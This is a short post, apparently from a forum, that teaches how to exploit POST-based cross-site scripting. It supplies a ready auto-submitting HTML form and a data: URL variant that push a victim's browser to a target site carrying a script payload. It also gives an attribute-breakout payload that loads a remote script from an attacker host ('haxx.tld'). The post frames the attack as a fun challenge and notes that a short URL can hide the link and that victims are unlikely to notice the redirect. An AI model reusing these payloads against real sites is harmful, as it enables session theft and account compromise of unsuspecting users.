The way you can exploit POST-based XSS in case the $_POST['var'] variable is used, so you can only submit content via POST-requests is to create a malicious HTTP page, that sends the user to the target site and even submits a malicious script on behalf of the user.
The link will of course point to a server you control, which could be a short url link, and when the user visits your server, the POST-data will instantly be sent by the user to the target site where the target site will respond to the user.
Meaning, even though the user visits your site first which may feel "malicious" to the user, the user will land at the target site, where the site will say it's own domain name in the URL field, and it could even say https with the blue background behind the favicon, making most users quickly forget they ever came by your server. After all, if your server responds fast, it will take a second or less which most users may not even notice As it's a fun challenge, build a .html document, such as:
<html><body><form method="POST" id="malform" action="https://targetsite.tld/script.php"><input type="hidden" name="target vulnerable variable" value="XSS" /></form><script>document.getElementById('malform').submit();</script>
If you want to test it in the URL Address Field in FireFox, just type this in:
data:text/html,<html><body><form method="POST" id="malform" action="https://targetsite.tld/script.php"><input type="hidden" name="target vulnerable variable" value="XSS" /></form><script>document.getElementById('malform').submit();</script>
Of course you have to edit the following fields: "action", "name" and "value".
If you need to use " to break a form or whatever, then value="XSS" should of course be e.g., value='XSS' instead, such as: value='"><script src="http://haxx.tld/.j"></script>' and so forth
Enjoy and merry X-mas